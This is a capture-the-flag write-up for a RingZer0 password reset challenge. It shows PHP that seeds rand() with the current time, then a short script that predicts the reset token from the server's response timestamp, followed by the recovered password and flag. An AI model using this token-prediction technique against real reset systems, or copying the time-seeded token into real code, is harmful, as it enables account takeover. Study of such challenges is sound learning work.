Writeup for password reset challenge:

Browsing to https://ringzer0team.com/challenges/113, we are faced with a form to enter the admin user name and a button to reset the password.  The source code is available:


if(isset($_POST['reset_username'])) {
		srand(time());
		$token =
		rand(1000000000000000,9999999999999999);
				
		$success = '<div class="success">Reset password link has been sent to admin@youdontownthisemail.com. Please follow the link ...
		$hSql->FastQuery('DELETE FROM chal_113 WHERE ip_addr = ?', array($_SERVER['REMOTE_ADDR']));
		$hSql->FastQuery('insert into chal_113 values (?,?,?)', array($_SERVER['REMOTE_ADDR'], $token, time() + 3600));
}

if(URL_HANDLE::GetInstance()->get->k != null) {
		$result = reset($hSql->FastQuery('SELECT * FROM chal_113 WHERE ip_addr = ? AND recovery_key = ? ', array($_SERVER['REMOTE_ADDR'], URL_HANDLE::GetInstance()->get->k)));
		if($hSql->RowCount() != 0) {
				if($result->expired_time > time()) {
						$success = '<div class="success">Here\'s your new password: XXXXXXXXXXXXXX</div>';
				} else {
						$success = '<div class="error">Expired recovery key!</div>';
				}
		} else {
				$success = '<div class="error">Invalid recovery key!</div>';
		}
}


Looking at the code, we can see that the token is a random number seeded with epoch time and it ranges from 1000000000000000
to 9999999999999999 (16 character number).  Using Burp to intercept the traffic (in my case) and entering "admin" for the
username and hitting the "Reset" button, I got a response time of Mon, 30 Jan 2017 21:46:14 GMT (yours will be different).
Converting this to epoch time is 1485812774 (I just went to http://www.epochconverter.com/ to convert it instead of using
the command line).  Using the same seed as the program on the server should produce the same result.  
So, I wrote the following php script:

<?php
srand(1485812774);
$token = rand(1000000000000000,9999999999999999) . "\n";
echo $token;
?>

I then ran the code at the command line:

$ php -f rand.php 
4238345323130489

I then used this number per the instructions to get the flag: https://ringzer0team.com/challenges/113/?k=4238345323130489

Here's your new password: Thi%P@s50rD!sM1n3*

Logging in produces the flag: FLAG-DlwwTV7vCQf4Dn281Yhb802x5U


Readings:
    http://php.net/manual/en/function.srand.php
    http://php.net/manual/en/function.rand.php
    http://en.wikipedia.org/wiki/Unix_time
